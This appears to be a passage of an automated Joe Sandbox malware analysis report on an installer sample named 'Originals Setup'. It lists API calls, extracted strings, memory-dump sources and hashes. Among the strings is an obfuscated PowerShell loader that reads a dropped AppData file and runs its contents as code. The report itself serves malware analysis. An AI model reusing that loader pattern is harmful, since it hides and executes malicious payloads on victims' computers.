                                                                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CCB
                                                                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404D74
                                                                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D83
                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DA3
                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404DF1
                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404DFC
                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404E03
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                            • String ID: $M$N
                                                                                                                                            • API String ID: 1638840714-813528018
                                                                                                                                            • Opcode ID: 530fea0a5efbac08350800dd6edac4f541af9ecf28185b85d10bd058308ad18e
                                                                                                                                            • Instruction ID: e15dc7f2636af8312206252945434afb9f5109210b4da1b7208a5bfe9f4b469d
                                                                                                                                            • Opcode Fuzzy Hash: 530fea0a5efbac08350800dd6edac4f541af9ecf28185b85d10bd058308ad18e
                                                                                                                                            • Instruction Fuzzy Hash: F30281B0A00209AFDB20DF54DD45AAE7BB5FB84315F10813AF610BA2E1D7789E42DF58
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404300
                                                                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 0040432A
                                                                                                                                            • SHBrowseForFolderA.SHELL32(?,0041F0B0,?), ref: 004043DB
                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004043E6
                                                                                                                                            • lstrcmpiA.KERNEL32(: Completed,Originals Setup: Completed), ref: 00404418
                                                                                                                                            • lstrcatA.KERNEL32(?,: Completed), ref: 00404424
                                                                                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404436
                                                                                                                                              • Part of subcall function 004053B5: GetDlgItemTextA.USER32(?,?,00000400,0040446D), ref: 004053C8
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
                                                                                                                                              • Part of subcall function 00405E28: CharNextA.USER32(?,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
                                                                                                                                              • Part of subcall function 00405E28: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2
                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(0041ECA8,?,?,0000040F,?,0041ECA8,0041ECA8,?,00000000,0041ECA8,?,?,000003FB,?), ref: 004044F3
                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040450E
                                                                                                                                              • Part of subcall function 00404667: lstrlenA.KERNEL32(Originals Setup: Completed,Originals Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404582,000000DF,00000000,00000400,?), ref: 00404705
                                                                                                                                              • Part of subcall function 00404667: wsprintfA.USER32 ref: 0040470D
                                                                                                                                              • Part of subcall function 00404667: SetDlgItemTextA.USER32(?,Originals Setup: Completed), ref: 00404720
                                                                                                                                            Strings
                                                                                                                                            • "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , xrefs: 004042CA
                                                                                                                                            • A, xrefs: 004043D4
                                                                                                                                            • Originals Setup: Completed, xrefs: 004043AE, 00404411
                                                                                                                                            • C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens, xrefs: 00404401
                                                                                                                                            • : Completed, xrefs: 00404412, 00404417, 00404422
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                            • String ID: "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $: Completed$A$C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$Originals Setup: Completed
                                                                                                                                            • API String ID: 2624150263-968870177
                                                                                                                                            • Opcode ID: 91bfd2be80532f9d84de11e62587bd6305631a6878a96e32016dec978ead2281
                                                                                                                                            • Instruction ID: bbf5d18d822f9ae48c727ed4067559616aa27203017815afcead8a6077e661fe
                                                                                                                                            • Opcode Fuzzy Hash: 91bfd2be80532f9d84de11e62587bd6305631a6878a96e32016dec978ead2281
                                                                                                                                            • Instruction Fuzzy Hash: 26A172B1900208ABDB11DFA6CD45BAF77B8EF84315F10843BF605B62D1D77C9A418B69
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004054A6
                                                                                                                                            • lstrcatA.KERNEL32(00420CE0,\*.*,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004054EE
                                                                                                                                            • lstrcatA.KERNEL32(?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 0040550F
                                                                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 00405515
                                                                                                                                            • FindFirstFileA.KERNEL32(00420CE0,?,?,?,00409014,?,00420CE0,?,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 00405526
                                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055D3
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004055E4
                                                                                                                                            Strings
                                                                                                                                            • \*.*, xrefs: 004054E8
                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                                                            • "C:\Users\user\Desktop\HVSU7GbA5N.exe", xrefs: 0040547D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                            • String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                            • API String ID: 2035342205-316821613
                                                                                                                                            • Opcode ID: 3622af7b4e34dfa1073d2e94fd2a24ea7cd3a3c76273722f7a65329ed5da0391
                                                                                                                                            • Instruction ID: f67e5f98a1b48f8b06c5baa1d65efce896aecc78963fcddf766b22b57dd7cee7
                                                                                                                                            • Opcode Fuzzy Hash: 3622af7b4e34dfa1073d2e94fd2a24ea7cd3a3c76273722f7a65329ed5da0391
                                                                                                                                            • Instruction Fuzzy Hash: 1851C070800A04BADF21AB25CC45BAF7AB9DB42314F14417BF444752D6D73C9A82DEAD
                                                                                                                                            APIs
                                                                                                                                            • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens, xrefs: 004020CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens
                                                                                                                                            • API String ID: 123533781-2870171211
                                                                                                                                            • Opcode ID: ca4ae825dc67163e39cab61414bf8ce73cd593aa0e1ad614b2f180b51b0ab79c
                                                                                                                                            • Instruction ID: d4c62fdc28843dfc30489809ccaf5da6a3b2e007b03a33f3ec024107d8c1ad9a
                                                                                                                                            • Opcode Fuzzy Hash: ca4ae825dc67163e39cab61414bf8ce73cd593aa0e1ad614b2f180b51b0ab79c
                                                                                                                                            • Instruction Fuzzy Hash: 20417D71A00209BFCB00EFA4CE88E9E7BB5BF48314B2042A9F911FB2D0D6799D41DB54
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                            • Opcode ID: 5285005a5125483a87b18e253de9f6a1e11305b0e3eef9b4f05c1d3784207578
                                                                                                                                            • Instruction ID: e6850a469ed090b17ef1dde7e6b5e911daaadda975b469663bbec5c58d3b5f53
                                                                                                                                            • Opcode Fuzzy Hash: 5285005a5125483a87b18e253de9f6a1e11305b0e3eef9b4f05c1d3784207578
                                                                                                                                            • Instruction Fuzzy Hash: B4F0A772604110ABD700E7749A49AEE7778DB51314F6045BBE141E20C1D3B85A41DA2A
                                                                                                                                            APIs
                                                                                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404047
                                                                                                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 0040405B
                                                                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404079
                                                                                                                                            • GetSysColor.USER32(?), ref: 0040408A
                                                                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404099
                                                                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040A8
                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004040AB
                                                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040BA
                                                                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040CF
                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404131
                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00404134
                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040415F
                                                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040419F
                                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004041AE
                                                                                                                                            • SetCursor.USER32(00000000), ref: 004041B7
                                                                                                                                            • ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,00000001), ref: 004041CA
                                                                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004041D7
                                                                                                                                            • SetCursor.USER32(00000000), ref: 004041DA
                                                                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404206
                                                                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040421A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                            • String ID: : Completed$N$open
                                                                                                                                            • API String ID: 3615053054-3069340868
                                                                                                                                            • Opcode ID: 8a9ae112f1df4d10fa1381c7e2026d7722a962e20b7826b4dde34b5403f790f5
                                                                                                                                            • Instruction ID: 7c7fff9fd1e172092069843c90e077616bef9326b7299cf1cce5c9f34bd91e75
                                                                                                                                            • Opcode Fuzzy Hash: 8a9ae112f1df4d10fa1381c7e2026d7722a962e20b7826b4dde34b5403f790f5
                                                                                                                                            • Instruction Fuzzy Hash: 8961E5B1A40209BFEB109F60DD45F6A7B78FB44741F10403AFB05BA2D1C7B8A951CB99
                                                                                                                                            APIs
                                                                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                            • DrawTextA.USER32(00000000,Originals Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                            • String ID: F$Originals Setup
                                                                                                                                            • API String ID: 941294808-1618244422
                                                                                                                                            • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                                                            • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                                                                                                            • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                                                                                                            • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
                                                                                                                                            APIs
                                                                                                                                            • lstrcpyA.KERNEL32(00421A68,NUL,?,00000000,?,00000000,?,00405A99,?,?,00000001,0040563C,?,00000000,000000F1,?), ref: 00405905
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A99,?,?,00000001,0040563C,?,00000000,000000F1,?), ref: 00405929
                                                                                                                                            • GetShortPathNameA.KERNEL32(00000000,00421A68,00000400), ref: 00405932
                                                                                                                                              • Part of subcall function 004057B3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057C3
                                                                                                                                              • Part of subcall function 004057B3: lstrlenA.KERNEL32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057F5
                                                                                                                                            • GetShortPathNameA.KERNEL32(?,00421E68,00000400), ref: 0040594F
                                                                                                                                            • wsprintfA.USER32 ref: 0040596D
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00421E68,C0000000,00000004,00421E68,?,?,?,?,?), ref: 004059A8
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004059B7
                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059EF
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421668,00000000,-0000000A,00409388,00000000,[Rename],00000000,00000000,00000000), ref: 00405A45
                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A57
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405A5E
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A65
                                                                                                                                              • Part of subcall function 0040584E: GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 00405852
                                                                                                                                              • Part of subcall function 0040584E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405874
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                                                                                            • API String ID: 1265525490-4148678300
                                                                                                                                            • Opcode ID: 1c7b9dc5b9d373c95b3dd538fd3a589de0fc08670cd7a038be037713092c8044
                                                                                                                                            • Instruction ID: e8cacc7e92f5bf2d1a44c635cad04a40df604100f7174d9fb2de66c5d7927451
                                                                                                                                            • Opcode Fuzzy Hash: 1c7b9dc5b9d373c95b3dd538fd3a589de0fc08670cd7a038be037713092c8044
                                                                                                                                            • Instruction Fuzzy Hash: 60410171704B19BFD3206B215C89F6B3A5CDB45714F14023ABD01F62D2D67CA8018E7E
                                                                                                                                            APIs
                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                                                                                                            • MulDiv.KERNEL32(0009EC46,00000064,0009EC4A), ref: 00402B88
                                                                                                                                            • wsprintfA.USER32 ref: 00402B98
                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402BA8
                                                                                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: F$J$verifying installer: %d%%
• API String ID: 1451636040-2980489140
• Opcode ID: 7c6b42b6a0cc2db989286670b759c7d1809337f1b1d19a01d5db9df498489f5d
• Instruction ID: 2a4a5d9d20a729fd9d452e33c08772ea7119627e62a29752c404fbbb79c7976e
• Opcode Fuzzy Hash: 7c6b42b6a0cc2db989286670b759c7d1809337f1b1d19a01d5db9df498489f5d
• Instruction Fuzzy Hash: 5601F471940209BBDF14AF60DD49EAE3779BB04345F008039FA06B52D0D7B9A955CB59
APIs
• CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
• CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
• CharNextA.USER32(?,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
• CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
